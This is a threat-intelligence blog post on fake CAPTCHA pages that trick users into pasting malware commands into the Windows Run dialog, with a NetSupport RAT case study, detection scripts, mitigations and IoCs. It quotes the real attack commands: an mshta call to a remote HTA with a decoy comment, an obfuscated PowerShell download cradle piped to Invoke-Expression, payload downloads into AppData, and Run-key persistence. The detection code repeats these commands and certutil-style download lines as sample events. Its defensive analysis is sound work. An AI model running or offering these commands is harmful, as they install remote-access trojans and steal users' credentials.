www.reliaquest.com
141.193.213.20
URL: https://www.reliaquest.com/blog/using-captcha-for-compromise/
Submission: On January 10 via api from IN — Scanned from DK
USING CAPTCHA FOR COMPROMISE: HACKERS FLIP THE SCRIPT
Alex Capraro, 17 December 2024
Threat Intelligence | Threat Research

TABLE OF CONTENTS
1. CAPTCHA Trickery: How Do Incidents Usually Play Out?
2. Shifting Threat Landscape in CAPTCHA Exploitation
3. What ReliaQuest is Doing
4. Fortifying Your Security Posture
5. Conclusion
6. IoCs

Key Points
* In our investigations, we identified malware campaigns using fake CAPTCHA pages that mimic trusted services like Google and Cloudflare.
* These malicious CAPTCHAs silently copy commands to users’ clipboards and then trick users into executing them via the Windows Run prompt.
* Infections typically involve information stealers (infostealers) and remote-access trojans (RATs) that extract sensitive data and give attackers persistent access to compromised systems.
* An increasing number of cybercriminals, including advanced threat actors like “APT28” (aka Fancy Bear), are successfully employing these deceptive tactics. This rapid proliferation underscores the need for timely and adaptive defensive measures.
* Organizations should educate employees to recognize the risks of fake CAPTCHAs and implement detection measures to block associated indicators of compromise (IoCs).

Cyber adversaries are constantly inventing new ways to outsmart defenses and exploit unsuspecting users. In early September 2024, ReliaQuest identified multiple incidents in customer environments involving compromised websites impersonating CAPTCHA pages—those familiar online verification tools that ask you to prove you’re human—to spread malware. These attacks impersonate trusted CAPTCHA services like Google and Cloudflare, lulling users into a false sense of security.

From October to early December 2024, our customers observed nearly twice as many fake CAPTCHA websites as in September. This surge was likely the result of researchers releasing the templates used in these campaigns, which inadvertently gave more threat actors the means to replicate the tactic. These incidents often culminate in credential theft, giving attackers a foothold for data breaches, account hijacking, or financial fraud. The tactic works because it exploits users’ trust in CAPTCHA systems: nothing is downloaded through the browser, so the controls that screen file downloads never see the payload, and the user executes it themselves.

In this report, we take you through the progression of a typical incident involving a fake CAPTCHA and detail the infostealers and RATs these campaigns distribute. To help you strengthen your defenses and reduce the impact of similar attacks, we also examine a real-world case study, how the fake CAPTCHA method might evolve, and how ReliaQuest’s automated response tools minimize its consequences.

CAPTCHA TRICKERY: HOW DO INCIDENTS USUALLY PLAY OUT?

The attack chain is deceptively simple. It uses a familiar CAPTCHA interface to get the user to execute a script, and its benign appearance is what makes it so effective. The incidents we investigated typically followed this sequence:

1. Malicious Redirect: A web user visits a compromised website and is redirected to another page, where they are presented with a familiar and seemingly harmless CAPTCHA challenge (see Figure 1).
2. JavaScript Clipboard Hijack: A script on the page silently copies a malicious command to the user’s clipboard, without their knowledge.
3. Unusual Run Prompt: Instead of clicking on traffic lights or bridges, the user is instructed to open the Run prompt—a Windows feature for quickly executing commands, opening programs, and accessing files—and paste what is on the clipboard, unknowingly running the malicious command.
4. Malware Installation: The command installs malware, often resulting in credential theft, as login details for systems, applications, and services are harvested and sent to the attackers.

Figure 1: Example of a fake CAPTCHA with the payload in the Run box

IMPERSONATING CLOUDFLARE: A STEP-BY-STEP LOOK AT THE ATTACK

The approach taken by the threat actor in this case study is particularly innovative. The actor used a malicious website that impersonated Cloudflare, a widely used content-delivery and distributed denial of service (DDoS) protection platform, to lend the attack credibility.

Initial Infection

In October 2024, a retail trade customer encountered a fake CAPTCHA (see Figure 2) hosted at inspyrehomedesign[.]com after being redirected from retailtouchpoints[.]com.

Figure 2: Fake Cloudflare CAPTCHA with the alerting command highlighted

Typical of deceptive CAPTCHAs, it instructed the user to paste into the Windows Run dialog. Completing this fake CAPTCHA executed the following command:

    "C:\WINDOWS\system32\mshta.exe" https://inspyrehomedesign[.]com/Ray-verify.html # ''Verify you are human - Ray Verification ID: 6450''

The “Verify you are human” text after the # sign is a decoy. The Run dialog shows the tail of a long pasted string, so the user sees what looks like a verification code rather than the mshta call, and mshta.exe tolerates the extra arguments (see Figure 2). Because mshta.exe is a signed Windows utility, its retrieval of “Ray-verify[.]html” looks like ordinary system activity, which makes the download of the next stage discreet. The HTML application contains PowerShell commands that execute the subsequent payload(s).
Secondary Script Execution

The second stage began with a PowerShell command that fetched and executed a further PowerShell script, hosted on traversecityspringbreak[.]com under the misleading name “o.png”. The command hides its intent by splitting the download cradle into three string fragments and by writing Invoke-Expression as I`E`X, both meant to defeat simple keyword matching:

    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We';$c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak[.]com/o/o.png'')'; $TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X

Joined back together, the fragments form (New-Object Net.WebClient).DownloadString('http://traversecityspringbreak[.]com/o/o.png'); the downloaded text is then piped into a second Invoke-Expression, so the script runs without ever being written to disk.

The script served as “o.png” first cleared the DNS cache, likely to remove traces of the domains it had resolved:

    ipconfig /flushdns

It then generated a random six-letter name and created a directory of that name in the user’s AppData folder ($randomFolderPath combines the AppData path with the generated name):

    $randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_})
    New-Item -ItemType Directory -Path $randomFolderPath

This led to the following path being created:

    C:\Users\CURRENTUSER\AppData\Roaming\geWGID

Downloading and Hiding Malicious Components

Next, 12 more files were downloaded from traversecityspringbreak[.]com, each requested under a .png name and written into the new directory:

    Invoke-WebRequest http://traversecityspringbreak[.]com/o/[n].png -OutFile C:\Users\CURRENTUSER\AppData\Roaming\geWGID\[filename]

The files included “client32.ini” (a configuration file) and “client32.exe” (the main executable of NetSupport RAT).

The threat actor then set the hidden attribute on the directory so that the 12 files would not show up in File Explorer:

    cmd /c attrib +h C:\Users\CURRENTUSER\AppData\Roaming\geWGID

Establishing Persistence and Running the RAT

A Run key named “Microsoft” was added to the registry so that the RAT starts at every logon of the user:

    New-ItemProperty -Path HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name Microsoft -Value C:\Users\CURRENTUSER\AppData\Roaming\geWGID\client32.exe

Finally, the adversary launched the RAT:

    Start-Process C:\CURRENTUSER\admin\AppData\Roaming\geWGID\client32.exe

How Did ReliaQuest Respond?

A ReliaQuest GreyMatter alert fired on the suspicious PowerShell execution in the first command line of this attack. Our investigation revealed that the IoCs, including client32.exe and client32.ini, were consistent with an installation of NetSupport RAT, a remote-access tool abused across many sectors for data theft, espionage, and network control. ReliaQuest isolated the affected host using GreyMatter Response Playbooks, revoked the user’s session, reset their password, and blocked the identified IoCs using GreyMatter Respond.

The key takeaway from this case study is the urgent need to educate employees about new and evolving manipulation techniques, so that they recognize suspicious behavior such as a website asking them to run commands. Companies should also implement network controls that block access to newly registered and known-compromised websites, further fortifying defenses against such threats.

To prevent similar incidents, targeted user training is crucial. Focus on helping your teams recognize the signs of malicious activity, such as unexpected requests to run commands or to download (potentially malicious) updates from unverified sources.
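Every stage of the chain above, from the Run-dialog paste through the hidden drop folder to the Run key, leaves a process-creation event, so the whole sequence can be triaged from command-line telemetry alone. The Python below is an added example written for this page, not ReliaQuest or GreyMatter code. It undoes the two obfuscations seen in the case study (backtick-split I`E`X and string fragments reassembled with -Join), then flags each stage over a list of constructed events whose command lines are copied from the case study; the URLs are left un-defanged there because that is how they appear in Sysmon Event ID 1 or Windows Event 4688 data. The ProcEvent shape and the stage names are assumptions.

```python
"""Triage Windows process-creation events for the fake-CAPTCHA (ClickFix) chain.

Added example for this article, not ReliaQuest code. The ProcEvent shape is an
assumption modelled on Sysmon Event ID 1 fields; SAMPLE_EVENTS are constructed
from the commands quoted in the case study above, not real telemetry.
"""
import re
from typing import List, NamedTuple


class ProcEvent(NamedTuple):
    parent: str    # ParentImage
    image: str     # Image
    cmdline: str   # CommandLine


class Finding(NamedTuple):
    stage: str
    detail: str


URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)
# $name='literal' assignments; a doubled '' inside the literal is an escaped quote
LITERAL_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")
# ($a,$b,$c -Join '') reassembly of those literals
JOIN_RE = re.compile(r"\(\s*((?:\$\w+\s*,\s*)+\$\w+)\s*-Join\s*''\s*\)", re.I)
APPDATA_RE = re.compile(r"\\AppData\\Roaming\\", re.I)
APPDATA_PATH_RE = re.compile(r"[A-Za-z]:\\Users\\[^\s\"']+\\AppData\\Roaming\\[^\s\"']*", re.I)


def normalize_powershell(cmdline: str) -> str:
    """Undo the two cheap obfuscations from the case study so keyword rules match.

    Stripping every backtick turns I`E`X into IEX; this is an approximation, since a
    backtick inside a quoted literal is a literal character. The -Join reassembly
    only resolves variables assigned as literals on the same command line.
    """
    text = cmdline.replace("`", "")
    literals = {name: value.replace("''", "'") for name, value in LITERAL_RE.findall(text)}

    def reassemble(match):
        names = [n.strip().lstrip("$") for n in match.group(1).split(",")]
        return "".join(literals.get(n, "$" + n) for n in names)

    return JOIN_RE.sub(reassemble, text)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _appdata_path(cmd: str) -> str:
    match = APPDATA_PATH_RE.search(cmd)
    return match.group(0) if match else ""


def triage(events: List[ProcEvent]) -> List[Finding]:
    """Return one Finding per matched stage, in event order."""
    findings: List[Finding] = []
    for ev in events:
        image, parent = _basename(ev.image), _basename(ev.parent)
        is_ps = image in ("powershell.exe", "pwsh.exe")
        cmd = normalize_powershell(ev.cmdline) if is_ps else ev.cmdline
        low = cmd.lower()
        urls = list(dict.fromkeys(URL_RE.findall(cmd)))  # de-duplicated, order kept
        first_url = urls[0] if urls else ""

        # Stage 1: mshta.exe fetching a remote HTA. The Run dialog is hosted by
        # explorer.exe, so an explorer.exe parent marks a user-pasted command.
        if image == "mshta.exe" and urls:
            findings.append(Finding("mshta_remote_hta", f"{parent} -> mshta.exe {first_url}"))
        if is_ps:
            # Stage 2: download cradle evaluated in memory with Invoke-Expression
            if "downloadstring" in low and re.search(r"\biex\b|invoke-expression", low):
                findings.append(Finding("iex_download_cradle", first_url))
            # Stage 3: payload files written under %APPDATA%
            if "invoke-webrequest" in low and "-outfile" in low and APPDATA_RE.search(cmd):
                findings.append(Finding("payload_written_to_appdata", first_url))
            # Stage 5: HKCU Run-key persistence pointing into AppData
            if re.search(r"\\currentversion\\run\b", low) and APPDATA_RE.search(cmd):
                findings.append(Finding("run_key_to_appdata", _appdata_path(cmd)))
        # Stage 4: drop directory hidden so it does not show in File Explorer
        if image in ("cmd.exe", "attrib.exe") and re.search(r"\battrib\b.*\+h", low) and APPDATA_RE.search(cmd):
            findings.append(Finding("dir_hidden_attrib", _appdata_path(cmd)))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [  # constructed from the case-study commands
    ProcEvent(EXPLORER, r"C:\Windows\System32\mshta.exe",
              '"C:\\WINDOWS\\system32\\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html '
              "# ''Verify you are human - Ray Verification ID: 6450''"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", PS,
              r"""$c1='(New-Object Net.We';$c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')'; $TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X"""),
    ProcEvent(PS, PS, r"Invoke-WebRequest http://traversecityspringbreak.com/o/1.png -OutFile C:\Users\CURRENTUSER\AppData\Roaming\geWGID\client32.exe"),
    ProcEvent(PS, r"C:\Windows\System32\cmd.exe", r"cmd /c attrib +h C:\Users\CURRENTUSER\AppData\Roaming\geWGID"),
    ProcEvent(PS, PS, r"New-ItemProperty -Path HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run -Name Microsoft -Value C:\Users\CURRENTUSER\AppData\Roaming\geWGID\client32.exe"),
    ProcEvent(EXPLORER, PS, r"Get-ChildItem C:\Users\CURRENTUSER\AppData\Roaming"),  # benign control
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding.stage:27} {finding.detail}")
```

Run as a script, it prints one line per stage with the recovered URL or path; the benign Get-ChildItem event produces nothing even though it touches AppData. The explorer.exe parent is the most durable signal here, because it survives any change of lure or LOLBin, whereas the keyword rules need a further normalizer as soon as the actor switches to -EncodedCommand.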
Encourage them to verify the authenticity of a URL before acting on it. Training should also cover unusual behavior in familiar interfaces, such as a CAPTCHA that asks for a non-standard action. Given clear examples, employees can spot these threats early. Finally, emphasize the importance of reporting suspicious activity immediately, so that responders can act quickly, for example by blocking malicious domains.

Active since at least 2017, “NetSupport RAT” is a malicious repurposing of the legitimate NetSupport Manager remote-administration tool, whose capabilities include keystroke logging, screen capture, and webcam access. It spreads primarily through phishing, drive-by downloads, and exploitation of vulnerabilities such as CVE-2023-36025, a Windows SmartScreen security-feature bypass. A NetSupport RAT infection gives attackers control of the host, enabling extensive data theft and unauthorized surveillance, and potentially lateral movement and disruption across the network.

SHIFTING THREAT LANDSCAPE IN CAPTCHA EXPLOITATION

INNOVATIVE STRATEGIES IN USER MANIPULATION

This is not the first time we have seen threat actors use the clipboard to trick individuals into executing malicious commands. In May 2024, we found that the “ClearFake” JavaScript framework had been used in a similar campaign to drop infostealers. Instead of a CAPTCHA, compromised websites displayed a prompt saying the content could not be shown properly (see Figure 3) and instructed users to install a root certificate by clicking a “Fix it” button.

Figure 3: Example of a “ClickFix/ClearFake” campaign pop-up message

Clicking the button copied obfuscated PowerShell code to the clipboard. Users were then guided to open a PowerShell terminal and paste the code in, which executed it. The ClearFake campaign is a less polished precursor of the new fake CAPTCHA tactics.

The root certificate approach relies heavily on user compliance: it requires steps such as manually copying the command and opening a PowerShell terminal, actions likely to raise suspicion among more cautious users. The fake CAPTCHA method simplifies the process by presenting a familiar and trusted interface with fewer steps to follow, which reduces hesitation. This streamlined method has in turn led to further modifications and improvements, including:

* New Fake CAPTCHA Templates: Templates mimicking Cloudflare and Google Meet pages have been created. By continually developing new landing pages to deliver the fake CAPTCHAs, attackers can target a broader range of potential victims.
* Bypassing User Verification: The method now skips the “verify” click before showing the instructions, so users complete the copy-paste steps more mindlessly and have less opportunity to scrutinize what they are doing.
* Clipboard Clearing: After the payload command has been executed, the clipboard is cleared to hide the malicious activity, making detection more difficult.

This evolution shows how quickly threat actors improve existing campaigns for greater impact. It demonstrates not only the adaptability of cybercriminals but also the growing sophistication of their methods. As threat actors refine their techniques, they exploit user trust more effectively, bypass security measures with greater ease, and widen their reach.

CAPTCHA ME IF YOU CAN: TOP THREATS

We reviewed customer incidents involving the new fake CAPTCHA campaign to find the most prevalent malware families in these infections between October and early December 2024:

1. “Lumma Stealer” (aka LummaC2, Lumma)
2. “StealC”
3. NetSupport RAT (aka Netsupport)
4. “Amadey”

Figure 4: BreachForums user recommending Lumma Stealer

RATs like NetSupport grant attackers persistent access to compromised systems, enabling continuous surveillance, data theft, and lateral movement within networks. Attackers can monitor activity, intercept sensitive communications, and potentially reach other connected systems, amplifying the impact of a breach.

Infostealers such as Lumma and StealC exfiltrate sensitive data, including login credentials, financial information, and personally identifiable information (PII). The stolen data is often sold on underground markets, leading to identity theft, financial fraud, and initial access into enterprise networks. The financial and reputational damage from such compromises can be significant, eroding customer trust and attracting regulatory penalties.

Threat actors on cybercriminal forums frequently ask for recommendations of the most effective tools. The widespread adoption of Lumma Stealer is likely influenced by endorsements from high-reputation forum users who have found the tool effective and advocate it to others. In the screenshot (see Figure 4), a prominent BreachForums user specifically recommends Lumma Stealer to another forum user.

HIGH-LEVEL HACKERS TURN TO BASIC CAPTCHA TACTICS

Both ordinary cybercriminals and sophisticated groups like APT28, which is linked to Russian military intelligence, are trying their hand at these tactics. A recent investigation by the Computer Emergency Response Team of Ukraine (CERT-UA) revealed that APT28 had been using fake CAPTCHA pages to infiltrate local government bodies. By mimicking reCAPTCHA interfaces, the group tricked users into executing commands that downloaded malicious scripts capable of establishing Secure Shell (SSH) tunnels and exfiltrating data, highlighting the technique’s simplicity and potency.
This is significant because, traditionally, effective techniques are developed first by skilled groups and eventually trickle down to less experienced attackers. Here the flow is reversed: advanced groups are adopting a tactic popularized by common cybercriminals, which underscores how effective the fake CAPTCHA lure is.

WHAT RELIAQUEST IS DOING

ReliaQuest is actively monitoring these evolving campaigns, with a focus on shifts in delivery mechanisms. Although the fake CAPTCHA lure is new, the execution layer is not: it relies on encoded or obfuscated PowerShell commands and Living off the Land binaries (LOLBins) such as MSHTA.exe. Existing detection rules for these common malware-delivery techniques therefore identify the activity.

GREYMATTER RESPOND AND AUTOMATED RESPONSE PLAYBOOKS

For the fastest remediation of threats like NetSupport RAT, organizations should implement automated response actions. Enabling GreyMatter’s Automated Response Playbooks allows automatic containment, reducing the mean time to contain (MTTC) a threat and halting the adversary’s progress. Alternatively, organizations can opt for the “RQ Approved” setting, under which our analyst team handles remediation; this still speeds up containment while leaving a ReliaQuest analyst’s discretion in the loop before a Response Playbook executes.

To contain NetSupport RAT most effectively, enabling and automating the Isolate Host playbook is crucial, after first confirming that legitimate user activity and critical business processes will not be disrupted. Isolation severs all connections to the attacker’s command-and-control (C2) infrastructure, preventing further malicious commands or downloads. Where isolating the host is not feasible, for instance on critical business assets, we recommend manually executing the Block IP, Block Domain, and Block URL playbooks against the identified attacker infrastructure. These actions stop the host from downloading additional malware and from reconnecting to the C2 infrastructure.

Because most malware, infostealers included, targets sensitive information, it is always best to assume that the user’s credentials may be compromised. Running the Terminate Active Sessions and Reset Password playbooks ends any hijacked sessions and changes the compromised credentials, preventing further unauthorized access. Running the Delete File and Block Hash playbooks removes the identified malicious files and blocks their execution on other hosts, limiting the threat actor’s ability to move laterally.

Organizations using ReliaQuest’s Automated Response Playbooks have reduced their MTTC to an average of five minutes for relevant alerts, compared to five hours or longer with manual response. These playbooks have proven effective at mitigating threats while minimizing operational disruption, allowing organizations to contain threats quickly and maintain continuity.

FORTIFY YOUR SECURITY POSTURE BY:

* Conducting Employee Training and Awareness: Hold regular training sessions on the risks of fake CAPTCHAs. Though this may sound generic, an informed workforce is a critical defense against social engineering. Training should cover how to spot a suspicious CAPTCHA, in particular a website that instructs the user to run a command.
* Disabling Password Saving in Browsers: Use Group Policy Objects (GPOs) or equivalent browser management policies to prevent web browsers from saving passwords. This protects against infostealers, which harvest stored browser credentials. Audit regularly to confirm the policy is applied and effective. Alternatively, deploy an organization-wide password manager, which gives users convenience while improving security.
* Deploying Constrained Language Mode: This mode restricts PowerShell to a safe subset of the language, blocking arbitrary .NET type creation, Add-Type, COM objects, and similar operations that attackers rely on; the New-Object Net.WebClient call in the case study above would fail under it, because only a short allow-list of core types can be instantiated. It is enforced reliably only when applied through an application-control policy (Windows Defender Application Control or AppLocker); the __PSLockdownPolicy environment variable is a debugging aid, not a security boundary. Cmdlets such as Invoke-WebRequest still work in this mode, so it narrows the attack surface rather than closing it.

CONCLUSION

In this report, we have highlighted the urgent need for robust security measures in the face of evolving CAPTCHA techniques used by both everyday cybercriminals and advanced groups like APT28. Automated incident response not only accelerates remediation but also allows for analyst oversight where needed. By implementing GreyMatter Automated Response Playbooks, organizations can swiftly contain these threats, significantly reducing MTTC and maintaining operational continuity.

Looking ahead, we predict with high confidence that threat actors will continue to refine their CAPTCHA-based campaigns and make them more elusive. Within the next three months, we anticipate changes to the fake CAPTCHA infection vector such as execution methods that avoid PowerShell altogether, for example using other LOLBins like forfiles.exe or certutil.exe to fetch or launch the initial stage and thereby evade existing detections. This evolution presents a significant risk and highlights the importance of a defense-in-depth strategy that layers multiple controls. Adopting that approach hardens your defenses, mitigates similar threats, and maintains a resilient security posture.
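The Conclusion predicts the same lure with certutil.exe or forfiles.exe in place of PowerShell, and the section on what ReliaQuest is doing notes that detection keys on the delivery technique rather than on the lure. The added Python below, written for this page and not ReliaQuest code, generalizes the Run-dialog stage: whichever LOLBin the pasted command invokes, the new process is a child of explorer.exe and its command line carries a URL or a nested command. forfiles.exe is classified as proxy execution, since it downloads nothing itself but can launch a downloader. The rule table and the sample command lines (example.invalid hosts) are constructed assumptions, not observed indicators.

```python
"""Flag LOLBin download or proxy-execution commands, and whether they came from the Run dialog.

Added example for this article, not ReliaQuest code. The rule table is an
assumption covering common download and proxy-execution binaries; SAMPLES use
example.invalid hosts and are constructed, not observed indicators.
"""
import re
from typing import Callable, Dict, List, NamedTuple, Optional, Tuple

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


class Hit(NamedTuple):
    binary: str
    technique: str
    url: str
    from_run_dialog: bool   # parent is explorer.exe, i.e. typed or pasted by the user
    decoy_comment: bool     # trailing " # ..." text that hides the command in the Run box


def _has(cmd: str, *needles: str) -> bool:
    low = cmd.lower()
    return any(n in low for n in needles)


# binary -> (technique label, predicate over the command line)
LOLBIN_RULES: Dict[str, Tuple[str, Callable[[str], bool]]] = {
    "certutil.exe":  ("certutil URL download",           lambda c: _has(c, "-urlcache", "-verifyctl") and bool(URL_RE.search(c))),
    "bitsadmin.exe": ("BITS transfer download",          lambda c: _has(c, "/transfer", "/addfile") and bool(URL_RE.search(c))),
    "curl.exe":      ("curl download to disk",           lambda c: _has(c, " -o ", "--output") and bool(URL_RE.search(c))),
    "mshta.exe":     ("remote HTA execution",            lambda c: bool(URL_RE.search(c))),
    "regsvr32.exe":  ("remote scriptlet via scrobj.dll", lambda c: _has(c, "/i:http", "-i:http") and _has(c, "scrobj")),
    "forfiles.exe":  ("forfiles /c proxy execution",     lambda c: _has(c, "/c ")),  # does not download itself
}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(parent: str, image: str, cmdline: str) -> Optional[Hit]:
    """Return a Hit if the image is a known LOLBin used in a download/proxy pattern."""
    rule = LOLBIN_RULES.get(_basename(image))
    if rule is None or not rule[1](cmdline):
        return None
    match = URL_RE.search(cmdline)
    return Hit(_basename(image), rule[0], match.group(0) if match else "",
               _basename(parent) == "explorer.exe", " # " in cmdline)


def scan(events: List[Tuple[str, str, str]]) -> List[Hit]:
    """Classify (parent, image, cmdline) triples; unmatched events are dropped."""
    return [hit for hit in (classify(*ev) for ev in events) if hit is not None]


EXPLORER = r"C:\Windows\explorer.exe"
SYS32 = r"C:\Windows\System32"
SAMPLES = [  # constructed; hosts are example.invalid
    (EXPLORER, SYS32 + r"\certutil.exe",
     r"certutil.exe -urlcache -split -f http://example.invalid/stage1.png %TEMP%\s.exe # ''I am not a robot''"),
    (EXPLORER, SYS32 + r"\bitsadmin.exe",
     r"bitsadmin /transfer job /download /priority high http://example.invalid/o.png %APPDATA%\o.exe"),
    (EXPLORER, SYS32 + r"\forfiles.exe",
     r'forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c curl.exe http://example.invalid/a.png -o %TEMP%\a.exe"'),
    (SYS32 + r"\cmd.exe", SYS32 + r"\curl.exe",
     r"curl.exe https://example.invalid/tools.zip -o C:\build\tools.zip"),   # scripted, not user-pasted
    (SYS32 + r"\cmd.exe", SYS32 + r"\certutil.exe",
     r"certutil.exe -hashfile C:\installer.msi SHA256"),                      # benign admin use
]

if __name__ == "__main__":
    for hit in scan(SAMPLES):
        flag = "RUN-DIALOG" if hit.from_run_dialog else "scripted  "
        print(f"{flag} {hit.binary:14} {hit.technique:32} {hit.url}")
```

The scripted curl.exe call is still reported, but with from_run_dialog False, which is how a detection engineer would separate a build script from a pasted ClickFix command without maintaining a separate rule per binary. The decoy_comment flag captures the trailing-comment trick from the case study independently of which binary carries it.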
IOCS We have incorporated these IoCs into our GreyMatter Intel feed for ReliaQuest customers. Our investigations found that these domains hosted fake CAPTCHA infrastructure in various incidents. * holidaybunch[.]com * forthedoglover[.]com * traversecityspringbreak[.]com * inspyrehomedesign[.]com * retailtouchpoints[.]com * webdemo[.]biz * thecopycat[.]biz STAY AHEAD OF THREATS WITH RAPID AND COMPREHENSIVE THREAT DETECTIONS As adversaries evolve their attack techniques, maintaining an effective threat detection strategy is crucial. Explore our Detection Design Guide for insights on leveraging detection orchestration to meet your organization's needs. Get the Ebook TABLE OF CONTENTS 1. CAPTCHA Trickery: How Do Incidents Usually Play Out? 2. Shifting Threat Landscape in CAPTCHA Exploitation 3. What ReliaQuest is Doing 4. Fortifying Your Security Posture 5. Conclusion 6. IoCs Alex Capraro Cyber Threat Intelligence Analyst Explore Blogs TABLE OF CONTENTS 1. CAPTCHA Trickery: How Do Incidents Usually Play Out? 2. Shifting Threat Landscape in CAPTCHA Exploitation 3. What ReliaQuest is Doing 4. Fortifying Your Security Posture 5. Conclusion 6. IoCs Alex Capraro Cyber Threat Intelligence Analyst Explore Blogs Resources RELATED BLOGS Threat Intelligence | Threat Research REPORT REVEALS SPEARPHISHING CONSTITUTES 81% OF UTILITIES SECTOR ALERTS 1 Mins Learn More Dark Web Research | Mergers and Acquisitions | Threat Research THE CYBERSECURITY CHALLENGE IN MERGERS AND ACQUISITIONS 1 Mins Learn More Threat Intelligence | Threat Research TOP CYBER ATTACKER TECHNIQUES, AUGUST–OCTOBER 2024 21 Mins Learn More All Blogs SEE GREYMATTER IN ACTION Get a live demo of our security operations platform, GreyMatter, and learn how you can improve visibility, reduce complexity, and manage risk in your organization. 
